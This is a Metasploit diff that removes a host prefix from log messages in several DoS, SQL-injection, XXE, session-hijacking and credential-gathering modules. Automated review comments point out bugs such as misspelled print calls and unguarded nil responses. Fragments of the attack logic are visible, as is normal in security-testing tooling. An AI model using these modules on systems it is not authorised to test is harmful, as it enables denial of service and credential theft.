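Review bot: After the request loop, `res.headers['Location']` is dereferenced without checking `res`, although the earlier requests in this method guard with `unless res` and `res &&`. A missing response here raises `NoMethodError`, which is not among the rescued exceptions, so `run` aborts with a stack trace instead of the "Result is undefined" message. The pattern `/\/my.policy/` also leaves the dot unescaped. Suggested line: `if res && res.headers['Location'] =~ /\/my\.policy/`.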
@@ -72,17 +72,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.body.length - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Errno::EPIPE, ::Timeout::Error # Same exceptions the HttpClient mixin catches end - print_status("#{peer} - DOS request sent") + print_status("DOS request sent") end def potential_static_files_uris diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index efb942abe9..cca21add81 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Triggering a heap overflow to cause DoS...") + print_status("Triggering a heap overflow to cause DoS...") begin res = send_request_cgi( @@ -57,16 +57,16 @@ class Metasploit3 < Msf::Auxiliary 'data' => message }) rescue ::Errno::ECONNRESET - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") return end if res - print_error("#{peer} - NFR Agent didn't die, it still answers...") + print_error("NFR Agent didn't die, it still answers...") return end - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") end end 
diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 40123ce208..3fb0da5c57 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -75,11 +75,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status "#{peer} - Using digit pattern of #{digit_pattern} taken to #{multiplier} places" + print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places" sploit = '[' sploit << evil_float_string sploit << ']' - print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" + print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" target_available = true begin @@ -91,19 +91,19 @@ class Metasploit3 < Msf::Auxiliary 'data' => sploit }) rescue ::Rex::ConnectionRefused - print_error "#{peer} - Unable to connect. (Connection refused)" + print_error "Unable to connect. (Connection refused)" target_available = false rescue ::Rex::HostUnreachable - print_error "#{peer} - Unable to connect. (Host unreachable)" + print_error "Unable to connect. (Host unreachable)" target_available = false rescue ::Rex::ConnectionTimeout - print_error "#{peer} - Unable to connect. (Timeout)" + print_error "Unable to connect. (Timeout)" target_available = false end return unless target_available - print_status "#{peer} - Checking availability" + print_status "Checking availability" begin res = send_request_cgi({ 'method' => verb, 
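Review bot: The rescue chain around the first request in `run` (hunk `@@ -91,19`) handles `ConnectionRefused`, `HostUnreachable` and `ConnectionTimeout`, but not `Errno::ECONNRESET`, which the availability check in the `@@ -118,13` hunk does rescue. A connection reset during the first request would therefore propagate out of `run` unreported. Add a matching clause: `rescue ::Errno::ECONNRESET`, then `print_error "Unable to connect. (Connection reset)"` and `target_available = false`.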
@@ -118,13 +118,13 @@ class Metasploit3 < Msf::Auxiliary target_available = false end rescue ::Rex::ConnectionError, Errno::ECONNRESET - print_good "#{peer} - DoS appears successful (Host unreachable)" + print_good "DoS appears successful (Host unreachable)" target_available = false end return unless target_available - print_status "#{peer} - Target is still responsive, DoS was unsuccessful." + print_status "Target is still responsive, DoS was unsuccessful." end end diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index 258f134c4b..8f9e60c3ff 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def user_exists(user) exists = wordpress_user_exists?(user) if exists - print_good("#{peer} - Username \"#{username}\" is valid") + print_good("Username \"#{username}\" is valid") report_cred( ip: rhost, port: rport, @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary return true else - print_error("#{peer} - \"#{user}\" is not a valid username") + print_error("\"#{user}\" is not a valid username") return false end end @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary def run if wordpress_and_online? if validate_user - print_status("#{peer} - Checking if user \"#{username}\" exists...") + print_status("Checking if user \"#{username}\" exists...") unless user_exists(username) print_error('Aborting operation - a valid username must be specified') return @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary starting_thread = 1 while starting_thread < rlimit do ubound = [rlimit - (starting_thread - 1), thread_count].min - print_status("#{peer} - Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") + print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") threads = [] 1.upto(ubound) do |i| 
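Review bot: `user_exists(user)` in wordpress_long_password_dos.rb prints `username` in its success message but `user` in its failure message, so the two branches name different things if the method is ever called with anything other than `username`. Use the parameter in both: `print_good("Username \"#{user}\" is valid")`. The `report_cred` arguments between the two hunks are not fully visible, so check them for the same mix-up.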
@@ -133,20 +133,20 @@ class Metasploit3 < Msf::Auxiliary begin wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout) rescue => e - print_error("#{peer} - Timed out during request #{(starting_thread - 1) + i}") + print_error("Timed out during request #{(starting_thread - 1) + i}") end end end threads.each(&:join) - print_good("#{peer} - Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") + print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") starting_thread += ubound end if wordpress_and_online? - print_error("#{peer} - FAILED: #{target_uri} appears to still be online") + print_error("FAILED: #{target_uri} appears to still be online") else - print_good("#{peer} - SUCCESS: #{target_uri} appears to be down") + print_good("SUCCESS: #{target_uri} appears to be down") end else print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress") diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 489458a65e..1567e9536f 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # try out the available memory in steps # apache will return a server error if the limit is reached while memory_to_use < 1024 - vprint_status("#{peer} - trying memory limit #{memory_to_use}MB") + vprint_status("trying memory limit #{memory_to_use}MB") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, 
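Review bot: The bare `rescue => e` around `wordpress_login` in hunk `@@ -133,20` reports every StandardError as a timeout and never uses `e`, so a connection reset or a bug in the login helper is logged as `Timed out during request N`. Either rescue the timeout class the helper actually raises (not visible here) or put the exception in the message, e.g. `print_error("Request #{(starting_thread - 1) + i} failed: #{e.class} - #{e.message}")`. The thread block this sits in opens before the hunk.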
@@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary # low timeout because the server error is returned immediately res = send_request_cgi(opts, timeout = 3) rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") break end if res && res.code == 500 # limit reached, return last limit last_limit = memory_to_use - fingerprint_step - vprint_status("#{peer} - got an error - using limit #{last_limit}MB") + vprint_status("got an error - using limit #{last_limit}MB") return last_limit else memory_to_use += fingerprint_step @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary end # no limit can be determined - print_warning("#{peer} - can not determine limit, will use default of #{default_limit}") + print_warning("can not determine limit, will use default of #{default_limit}") return default_limit end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary } space_to_fill = size_bytes - empty_xml.size - vprint_status("#{peer} - max XML space to fill: #{space_to_fill} bytes") + vprint_status("max XML space to fill: #{space_to_fill} bytes") payload = "&#{entity};" * (space_to_fill / 6) entity_value_length = space_to_fill - payload.length @@ -148,15 +148,15 @@ class Metasploit3 < Msf::Auxiliary def run # get the max size - print_status("#{peer} - trying to fingerprint the maximum memory we could use") + print_status("trying to fingerprint the maximum memory we could use") size = fingerprint - print_status("#{peer} - using #{size}MB as memory limit") + print_status("using #{size}MB as memory limit") # only generate once xml = generate_xml(size) for x in 1..rlimit - print_status("#{peer} - sending request ##{x}...") + print_status("sending request ##{x}...") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, 
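Review bot: `send_request_cgi(opts, timeout = 3)` in hunk `@@ -76,14` assigns a throwaway local named `timeout` inside the argument list. This is not a keyword argument; the value is still passed positionally, and the assignment only obscures that. `res = send_request_cgi(opts, 3)` together with the existing "low timeout" comment says the same thing. The `while` loop and the enclosing method start before the hunk.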
@@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary c.send_request(r) # Don't wait for a response, can take very long rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index c6f8a24995..fbe1395df8 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -81,37 +81,37 @@ class Metasploit3 < Msf::Auxiliary def run # inform user of action currently selected - print_status("#{peer} - Action: #{action.name} selected") + print_status("Action: #{action.name} selected") # CHECK action if action.name == 'CHECK' - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") if check_user - print_good("#{peer} - User online") + print_good("User online") else - print_status("#{peer} - User offline") + print_status("User offline") end return end # DOS action - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") check_result = check_user if check_result == false - print_error("#{peer} - User is already offline... Exiting...") + print_error("User is already offline... Exiting...") return end # only proceed if action is DOS the target user is # online or the CHECKUSER option has been disabled - print_status("#{peer} - Targeting user: #{@sipuri}...") + print_status("Targeting user: #{@sipuri}...") dos_result = dos_user if dos_result - print_good("#{peer} - User is offline, DoS was successful") + print_good("User is offline, DoS was successful") else - print_error("#{peer} - User is still online") + print_error("User is still online") end end 
@@ -122,22 +122,22 @@ class Metasploit3 < Msf::Auxiliary res = send_msg(msg) if res.nil? - vprint_good("#{peer} - User #{@sipuri} is no responding") + vprint_good("User #{@sipuri} is no responding") return true elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - DoS packet successful. Response received (430 Flow Failed)") - vprint_good("#{peer} - User #{@sipuri} is no longer responding") + vprint_good("DoS packet successful. Response received (430 Flow Failed)") + vprint_good("User #{@sipuri} is no longer responding") return true elsif res =~ /404 Not Found/i - vprint_error("#{peer} - DoS packet appears successful. Response received (404 Not Found)") - vprint_status("#{peer} - User appears to be currently offline or not in a Sametime video session") + vprint_error("DoS packet appears successful. Response received (404 Not Found)") + vprint_status("User appears to be currently offline or not in a Sametime video session") return true elsif res =~ /200 OK/i vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)") vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer") return false else - vprint_status("#{peer} - Unexpected response") + vprint_status("Unexpected response") return true end end 
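Review bot: The `200 OK` branch in hunk `@@ -122,22` calls `vrint_error` and `vrint_status`, which are misspelled, so that branch raises NoMethodError instead of returning false. Probably for the same reason, these are the only two lines in the hunk that still carry the `#{peer} - ` prefix. They should read `vprint_error("DoS packet unsuccessful. Response received (200)")` and `vprint_status("Check user is running an affected version of IBM Lotus Sametime WebPlayer")`. The first changed line also says "is no responding", which looks like it should be "is not responding". The method this belongs to starts before the hunk.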
@@ -150,26 +150,26 @@ class Metasploit3 < Msf::Auxiliary # check response for current user status - common return codes if res.nil? - vprint_error("#{peer} - No response") + vprint_error("No response") return false elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - User #{@sipuri} is no longer responding (already DoS'd?)") + vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)") return false elsif res =~ /404 Not Found/i - vprint_error("#{peer} - User #{@sipuri} is currently offline or not in a Sametime video session") + vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session") return false elsif res =~ /200 OK/i - vprint_good("#{peer} - User #{@sipuri} is online") + vprint_good("User #{@sipuri} is online") return true else - vprint_error("#{peer} - Unknown server response") + vprint_error("Unknown server response") return false end end def create_message(length) # create SIP MESSAGE of specified length - vprint_status("#{peer} - Creating SIP MESSAGE packet #{length} bytes long") + vprint_status("Creating SIP MESSAGE packet #{length} bytes long") source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1) source_host = Rex::Socket.source_address(datastore['RHOST']) @@ -215,13 +215,13 @@ class Metasploit3 < Msf::Auxiliary end return res rescue ::Rex::ConnectionRefused - print_status("#{peer} - Unable to connect") + print_status("Unable to connect") return nil rescue ::Errno::ECONNRESET - print_status("#{peer} - DoS packet successful, host not responding.") + print_status("DoS packet successful, host not responding.") return nil rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_status("#{peer} - Couldn't connect") + print_status("Couldn't connect") return nil ensure # disconnect socket if still open diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 353e0dbbf5..8838dd445e 100644 
--- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res and res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res and res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(6) right_marker = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") loop do file = sqli(left_marker, right_marker, i, cookie, filename) 
diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 353e7ce052..3eeeb94f06 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res && res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end 
@@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary right_marker = Rex::Text.rand_text_alpha(6) sql_true = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") begin ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do @@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary end rescue ::Timeout::Error if full.blank? - print_error("#{peer} - Timeout while exploiting sqli, nothing recovered") + print_error("Timeout while exploiting sqli, nothing recovered") else - print_error("#{peer} - Timeout while exploiting sqli, #{full.length} bytes recovered") + print_error("Timeout while exploiting sqli, #{full.length} bytes recovered") end return end diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index 0dd09d79aa..bfaf631e24 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - Unable to receive a response") + print_error("Unable to receive a response") return end @@ -213,15 +213,15 @@ class Metasploit3 < Msf::Auxiliary if rdspass.empty? and password.empty? # No pass collected, no point to store anything - print_error("#{peer} - No passwords found") + print_error("No passwords found") return end - print_good("#{peer} - rdspassword = #{rdspass}") - print_good("#{peer} - password = #{password}") - print_good("#{peer} - encrypted = #{encrypted}") + print_good("rdspassword = #{rdspass}") + print_good("password = #{password}") + print_good("encrypted = #{encrypted}") p = store_loot('coldfusion.password.properties', 'text/plain', rhost, res.body) - print_good("#{peer} - password.properties stored in '#{p}'") + print_good("password.properties stored in '#{p}'") end end 
diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index ac02e16386..0967baf944 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # def get_session_tokens tokens = nil - print_status("#{peer} - Finding session tokens...") + print_status("Finding session tokens...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri( @@ -52,15 +52,15 @@ class Metasploit3 < Msf::Auxiliary 'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] } }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 404 - print_error("#{peer} - Could not find 'jqueryFileTree.php'") + print_error("Could not find 'jqueryFileTree.php'") elsif res.code == 200 and res.body =~ />sess_([a-z0-9]+)</ tokens = res.body.scan(/>sess_([a-z0-9]+)</) num_tokens = tokens.length.to_s.gsub(/(\d)(?=(\d\d\d)+(?!\d))/) { "#{$1}," } - print_good("#{peer} - Found #{num_tokens} session tokens") + print_good("Found #{num_tokens} session tokens") else - print_error("#{peer} - Could not find any session tokens") + print_error("Could not find any session tokens") end return tokens end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary # Get user's credentials # def get_user_info(user_id) - vprint_status("#{peer} - Retrieving user's credentials") + vprint_status("Retrieving user's credentials") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'user/fiche.php'), @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary }.to_a.shuffle] }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /User card/ record = [ res.body.scan(/name="login" value="([^"]+)"/ ).flatten.first, 
@@ -89,11 +89,11 @@ class Metasploit3 < Msf::Auxiliary res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first ] unless record.empty? - print_good("#{peer} - Found credentials (#{record[0]}:#{record[1]})") + print_good("Found credentials (#{record[0]}:#{record[1]})") return record end else - print_warning("#{peer} - Could not retrieve user credentials") + print_warning("Could not retrieve user credentials") end end @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => @cookie }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.body =~ /<div class="login"><a href="[^"]*\/user\/fiche\.php\?id=(\d+)">/ user_id = "#{$1}" - vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'") + vprint_good("Hijacked session for user with ID '#{user_id}'") return user_id else - vprint_status("#{peer} - Could not hijack session. Session is invalid.") + vprint_status("Could not hijack session. Session is invalid.") end end @@ -125,11 +125,11 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}" }) if !res - print_error("#{peer} - Connection failed") + print_error("Connection failed") elsif res.code == 200 and res.get_cookies =~ /DOLSESSID_([a-f0-9]{32})=/ return "DOLSESSID_#{$1}=#{token}" else - print_warning("#{peer} - Could not create session cookie") + print_warning("Could not create session cookie") end end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary def progress(current, total) done = (current.to_f / total.to_f) * 100 percent = "%3.2f%%" % done.to_f - vprint_status("#{peer} - Trying to hijack a session - " + + vprint_status("Trying to hijack a session - " + "%7s done (%d/%d tokens)" % [percent, current, total]) end 
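Review bot: `unless record.empty?` in hunk `@@ -89,11` looks like it can never be false. `record` appears to be a fixed-size array literal opened in the previous hunk, and such an array keeps its length even when every `scan(...).flatten.first` returns nil. In that case the module would print `Found credentials (:)` and return a row of nils to the caller. Testing the extracted values instead, e.g. `unless record.compact.empty?`, would match the intent of the guard. The array literal and `get_user_info` both begin outside this hunk.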
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary def run return unless tokens = get_session_tokens credentials = [] - print_status("#{peer} - Trying to hijack a session...") + print_status("Trying to hijack a session...") tokens.flatten.each_with_index do |token, index| if @cookie = create_cookie(token) and user_id = get_user_id credentials << get_user_info(user_id) @@ -189,7 +189,7 @@ class Metasploit3 < Msf::Auxiliary end if credentials.empty? - print_warning("#{peer} - No credentials collected.") + print_warning("No credentials collected.") return end cred_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/gather/drupal_openid_xxe.rb b/modules/auxiliary/gather/drupal_openid_xxe.rb index a7cae618a0..6110eb4ed8 100644 --- a/modules/auxiliary/gather/drupal_openid_xxe.rb +++ b/modules/auxiliary/gather/drupal_openid_xxe.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary res = send_openid_auth(signature) unless res - vprint_status("#{peer} - Connection timed out") + vprint_status("Connection timed out") return Exploit::CheckCode::Unknown end @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary end unless res.code == 500 - print_warning("#{peer} - Unexpected answer, trying to parse anyway...") + print_warning("Unexpected answer, trying to parse anyway...") end error_loot = parse_loot(res.body) @@ -142,12 +142,12 @@ class Metasploit3 < Msf::Auxiliary # Check if file was retrieved on the drupal answer # Better results, because there isn't URL encoding, # plus probably allows to retrieve longer files. - print_status("#{peer} - Searching loot on the Drupal answer...") + print_status("Searching loot on the Drupal answer...") unless loot?(error_loot) # Check if file was leaked to the fake OpenID endpoint # Contents are probably URL encoded, plus probably long # files aren't full, but something is something :-) - print_status("#{peer} - Searching loot on HTTP query...") + print_status("Searching loot on HTTP query...") loot?(@http_loot) end 
@@ -158,12 +158,12 @@ class Metasploit3 < Msf::Auxiliary def on_request_uri(cli, request) if request.uri =~ /#{@prefix}/ - vprint_status("#{peer} - Signature found, parsing file...") + vprint_status("Signature found, parsing file...") @http_loot = parse_loot(request.uri) return end - print_status("#{peer} - Sending XRDS...") + print_status("Sending XRDS...") send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' }) end @@ -189,7 +189,7 @@ class Metasploit3 < Msf::Auxiliary def store(data) path = store_loot("drupal.file", "text/plain", rhost, data, datastore['FILEPATH']) - print_good("#{peer} - File found and saved to path: #{path}") + print_good("File found and saved to path: #{path}") end def parse_loot(data) diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index b699d58ddf..0fe0e0039c 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -78,11 +78,11 @@ class Metasploit3 < Msf::Auxiliary } die(); EOT - print_status("#{peer} - Reading user credentials from the database") + print_status("Reading user credentials from the database") response = execute_php_code(php) if not response or response.code != 200 then - print_error("#{peer} - Failed: Error requesting page") + print_error("Failed: Error requesting page") return end @@ -93,8 +93,8 @@ class Metasploit3 < Msf::Auxiliary def run credentials = read_credentials if credentials.empty? - print_warning("#{peer} - No credentials collected.") - print_warning("#{peer} - Sometimes this is because the server isn't in the vulnerable state.") + print_warning("No credentials collected.") + print_warning("Sometimes this is because the server isn't in the vulnerable state.") return end diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index dd4bc8e7b6..a75f6dc4b3 100644 
--- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -116,30 +116,30 @@ class Metasploit3 < Msf::Auxiliary requests = datastore['REQUESTS'] backends = [] @uri = normalize_uri(target_uri.path.to_s) - print_status("#{peer} - Starting request #{@uri}") + print_status("Starting request #{@uri}") (1..requests).each do |i| cookie = get_cookie # Get the cookie # If the cookie is not found, stop process if cookie.empty? || cookie[:id].nil? - print_error("#{peer} - F5 BigIP load balancing cookie not found") + print_error("F5 BigIP load balancing cookie not found") return end # Print the cookie name on the first request if i == 1 - print_good("#{peer} - F5 BigIP load balancing cookie \"#{cookie[:id]} = #{cookie[:value]}\" found") + print_good("F5 BigIP load balancing cookie \"#{cookie[:id]} = #{cookie[:value]}\" found") if cookie[:id].start_with?('BIGipServer') - print_good("#{peer} - Load balancing pool name \"#{cookie[:id].split('BIGipServer')[1]}\" found") + print_good("Load balancing pool name \"#{cookie[:id].split('BIGipServer')[1]}\" found") end if cookie[:value].start_with?('rd') - print_good("#{peer} - Route domain \"#{cookie[:value].split('rd')[1].split('o')[0]}\" found") + print_good("Route domain \"#{cookie[:value].split('rd')[1].split('o')[0]}\" found") end end backend = cookie_decode(cookie[:value]) unless backend[:host].nil? || backends.include?(backend) - print_good("#{peer} - Backend #{backend[:host]}:#{backend[:port]} found") + print_good("Backend #{backend[:host]}:#{backend[:port]} found") backends.push(backend) end end 
@@ -150,10 +150,10 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused - print_error("#{peer} - Network connection error") + print_error("Network connection error") rescue ::Rex::ConnectionError - print_error("#{peer} - Network connection error") + print_error("Network connection error") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/gather/hp_snac_domain_creds.rb b/modules/auxiliary/gather/hp_snac_domain_creds.rb index 7610799f2b..ad4b1c1cd2 100644 --- a/modules/auxiliary/gather/hp_snac_domain_creds.rb +++ b/modules/auxiliary/gather/hp_snac_domain_creds.rb @@ -118,27 +118,27 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Get Domain Info") + print_status("Get Domain Info") session = get_session if session.nil? - print_error("#{peer} - Failed to get a valid session, maybe the target isn't HP SNAC installation?") + print_error("Failed to get a valid session, maybe the target isn't HP SNAC installation?") return end - print_status("#{peer} - Exploiting Authentication Bypass to gather Domain Controller Info...") + print_status("Exploiting Authentication Bypass to gather Domain Controller Info...") domain_info = get_domain_info(session) if domain_info.nil? - print_error("#{peer} - Failed, maybe the target isn't vulnerable") + print_error("Failed, maybe the target isn't vulnerable") return end - print_status("#{peer} - Parsing data gathered...") + print_status("Parsing data gathered...") credentials = parse_domain_data(domain_info) if credentials.empty? - print_warning("#{peer} - Any Domain Controller has been found...") + print_warning("Any Domain Controller has been found...") return end diff --git a/modules/auxiliary/gather/huawei_wifi_info.rb b/modules/auxiliary/gather/huawei_wifi_info.rb index f817643557..83e648b066 100644 --- a/modules/auxiliary/gather/huawei_wifi_info.rb 
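Review bot: In the `hp_snac_domain_creds.rb` hunk (`@@ -118,27`), the warning printed when `credentials.empty?` reads "Any Domain Controller has been found...", which says the opposite of what happened. `print_warning("No Domain Controller has been found...")` matches the branch. The earlier error string "maybe the target isn't HP SNAC installation?" is also missing an article ("isn't an HP SNAC installation").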
